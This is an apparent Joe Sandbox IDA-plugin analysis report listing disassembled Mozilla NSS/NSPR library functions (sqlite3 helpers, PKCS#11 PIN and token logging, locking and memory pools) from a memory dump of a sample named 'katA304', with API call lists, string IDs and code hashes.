                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_value_text16$sqlite3_log
                                                            • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                            • API String ID: 2274617401-4033235608
                                                            • Opcode ID: 10b0654110923d9fa8e1a5f313f191c74e965b4c1266eac0de87e0c908a2cd2d
                                                            • Instruction ID: fa66192be9917c58a8beb86a2ec4a3da3b048f3c0e4000a6f1fd2242139d6ffc
                                                            • Opcode Fuzzy Hash: 10b0654110923d9fa8e1a5f313f191c74e965b4c1266eac0de87e0c908a2cd2d
                                                            • Instruction Fuzzy Hash: AB314673A089A1ABDB084B24B8167E97321B783318F1F0125D8685BF58C721FCE287D2
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_InitPIN), ref: 6CA32DF6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA32E24
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA32E33
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA32E49
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA32E68
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA32E81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                            • API String ID: 1003633598-1777813432
                                                            • Opcode ID: 1540947196728cfab01870360cd7c849ed49d158a70ceaccf309af6021212e91
                                                            • Instruction ID: 59f7ad0b6e520b292a65e8ba734c2da647e9bd2f8178a011cc2e400956a5747e
                                                            • Opcode Fuzzy Hash: 1540947196728cfab01870360cd7c849ed49d158a70ceaccf309af6021212e91
                                                            • Instruction Fuzzy Hash: 453107756051A4ABEB008F15ED5DB6E3B79EB42358F084124E80DE7B92DB349888CBD2
                                                            APIs
                                                            • sqlite3_initialize.NSS3 ref: 6CAD2D9F
                                                              • Part of subcall function 6C98CA30: EnterCriticalSection.KERNEL32(?,?,?,6C9EF9C9,?,6C9EF4DA,6C9EF9C9,?,?,6C9B369A), ref: 6C98CA7A
                                                              • Part of subcall function 6C98CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C98CB26
                                                            • sqlite3_exec.NSS3(?,?,6CAD2F70,?,?), ref: 6CAD2DF9
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAD2E2C
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E3A
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E52
                                                            • sqlite3_mprintf.NSS3(6CB3AAF9,?), ref: 6CAD2E62
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E70
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E89
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2EBB
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2ECB
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAD2F3E
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2F4C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                            • String ID:
                                                            • API String ID: 1957633107-0
                                                            • Opcode ID: f73c09d3f68938dd98760e9fc7c29911fe8cbe3b03278264a7d82bae2b1d1c37
                                                            • Instruction ID: 7de7330a26eafde2cae3e13490a1f32e6d5a99a4411b42fe49895ce32cf0fc9e
                                                            • Opcode Fuzzy Hash: f73c09d3f68938dd98760e9fc7c29911fe8cbe3b03278264a7d82bae2b1d1c37
                                                            • Instruction Fuzzy Hash: 70618EB5E012068BEB00CF68D884BDEBBB1AF58348F1A4524DC55A7701EB35FC95CBA1
                                                            APIs
                                                            • TlsGetValue.KERNEL32(6CA23F23,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C62
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C76
                                                            • PL_HashTableLookup.NSS3(00000000,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C86
                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C93
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22CC6
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22CDA
                                                            • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23), ref: 6CA22CEA
                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?), ref: 6CA22CF7
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?), ref: 6CA22D4D
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA22D61
                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6CA22D71
                                                            • PR_Unlock.NSS3(?), ref: 6CA22D7E
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                            • String ID:
                                                            • API String ID: 2446853827-0
                                                            • Opcode ID: adbc1d97378e7fea7fef89fedd3f806fdfc940343ffd90b63392d29031bb9f48
                                                            • Instruction ID: e55b69f52f1d70eba5bdc411f3517b896a3555232ce6d33393ebe40852e3b1eb
                                                            • Opcode Fuzzy Hash: adbc1d97378e7fea7fef89fedd3f806fdfc940343ffd90b63392d29031bb9f48
                                                            • Instruction Fuzzy Hash: 4351FA76D00115ABEB009F24DC459AA7778FF19368B0C8624ED1897B11E731EDA9CBE1
                                                            APIs
                                                            • PR_CallOnce.NSS3(6CB62120,Function_00097E60,00000000,?,?,?,?,6CA9067D,6CA91C60,00000000), ref: 6CA17C81
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • TlsGetValue.KERNEL32 ref: 6CA17CA0
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA17CB4
                                                            • PR_Unlock.NSS3 ref: 6CA17CCF
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • TlsGetValue.KERNEL32 ref: 6CA17D04
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA17D1B
                                                            • realloc.MOZGLUE(-00000050), ref: 6CA17D82
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA17DF4
                                                            • PR_Unlock.NSS3 ref: 6CA17E0E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                            • String ID:
                                                            • API String ID: 2305085145-0
                                                            • Opcode ID: ab054cd47419bf94e802834933693010b67149544cc96676c1fe06e48d7e8278
                                                            • Instruction ID: 7b182c7db9829dbe92dbd656c550c7a41fd580079e0b8cff824ccdebed0cd3c5
                                                            • Opcode Fuzzy Hash: ab054cd47419bf94e802834933693010b67149544cc96676c1fe06e48d7e8278
                                                            • Instruction Fuzzy Hash: D451F071A8D1049FEF00AF29CC44A7537B6FB06318F195129ED04C7BA2EB30D8E5CA82
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D11
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D2A
                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D4A
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D57
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D97
                                                            • PR_Lock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DBA
                                                            • PR_WaitCondVar.NSS3 ref: 6C984DD4
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DE6
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DEF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                            • String ID:
                                                            • API String ID: 3388019835-0
                                                            • Opcode ID: 9b343616d7d1512e5f04b0afc7c9f1589be3aa77877fc2a5347a4d1f0c9694c6
                                                            • Instruction ID: 4470e1c8846b6fd260b2b9db6921728bef68f0db34a12dba47a717ed8c337863
                                                            • Opcode Fuzzy Hash: 9b343616d7d1512e5f04b0afc7c9f1589be3aa77877fc2a5347a4d1f0c9694c6
                                                            • Instruction Fuzzy Hash: A9419DB5A06615CFCB00AF79C4945A9BBF8BF09314F054A69DC889B750E730E885CF82
                                                            APIs
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17CE0
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17D36
                                                            • PR_Realloc.NSS3(?,00000080), ref: 6CB17D6D
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17D8B
                                                            • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CB17DC2
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17DD8
                                                            • malloc.MOZGLUE(00000080), ref: 6CB17DF8
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17E06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                            • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                            • API String ID: 530461531-3274975309
                                                            • Opcode ID: ba810d48dd33e1028e09e740554376ab35daa9f7993c438ae7a1df5d15ebbaa3
                                                            • Instruction ID: 0d173eb9356baf1a2a0cde671be682dcbf8b544a5cfec03503a6a19c8bed7bc4
                                                            • Opcode Fuzzy Hash: ba810d48dd33e1028e09e740554376ab35daa9f7993c438ae7a1df5d15ebbaa3
                                                            • Instruction Fuzzy Hash: EC4115B16142959FDB04CF28CD8096B3BA6FF84318B25456CE819ABF51D770E841CBA2
                                                            APIs
                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DE64), ref: 6CA4ED0C
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA4ED22
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CA4ED4A
                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CA4ED6B
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA4ED38
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA4ED52
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA4ED83
                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CA4ED95
                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CA4ED9D
                                                              • Part of subcall function 6CA664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CA6127C,00000000,00000000,00000000), ref: 6CA6650E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                            • String ID: security
                                                            • API String ID: 3323615905-3315324353
                                                            • Opcode ID: 830b14b4d44cb967b91c51245be9ea8fab426cccffc3c26960f5a8e64f3842c4
                                                            • Instruction ID: abac839d3fe5f343145f25f8317179d5c5d4e944b3638f52f25fdbe50cb73ee6
                                                            • Opcode Fuzzy Hash: 830b14b4d44cb967b91c51245be9ea8fab426cccffc3c26960f5a8e64f3842c4
                                                            • Instruction Fuzzy Hash: 74115C79A002146BE7109A26EE44BBBB37CAF4170DF044934E84563F81FB74A59CC6E7
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_InitToken), ref: 6CA32CEC
                                                            • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CA32D07
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA32D22
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10B88
                                                              • Part of subcall function 6CB109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB10C5D
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB10C8D
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10C9C
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10CD1
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB10CEC
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10CFB
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10D16
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB10D26
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10D35
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB10D65
                                                              • Part of subcall function 6CB109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB10D70
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10D90
                                                              • Part of subcall function 6CB109D0: free.MOZGLUE(00000000), ref: 6CB10D99
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA32D3B
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB10BAB
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10BBA
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10D7E
                                                            • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CA32D54
                                                              • Part of subcall function 6CB109D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB10BCB
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10BDE
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10C16
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                            • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                            • API String ID: 420000887-1567254798
                                                            • Opcode ID: 8dca61bb9f7405d3f27321a3e0542d22af069526c1ffafefa4e9c889581a4e2f
                                                            • Instruction ID: a17c2d6144076a4d6dd2fbe4152ade9d950522e8d30613909ff63a58333a927d
                                                            • Opcode Fuzzy Hash: 8dca61bb9f7405d3f27321a3e0542d22af069526c1ffafefa4e9c889581a4e2f
                                                            • Instruction Fuzzy Hash: 2521F875200190EFEB019F55ED6CA693BB5EB4239DF485110F50CD7A63DB34889CCBA2
                                                            APIs
                                                            • PR_LogPrint.NSS3(Aborting,?,6C9F2357), ref: 6CB10EB8
                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C9F2357), ref: 6CB10EC0
                                                            • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB10EE6
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
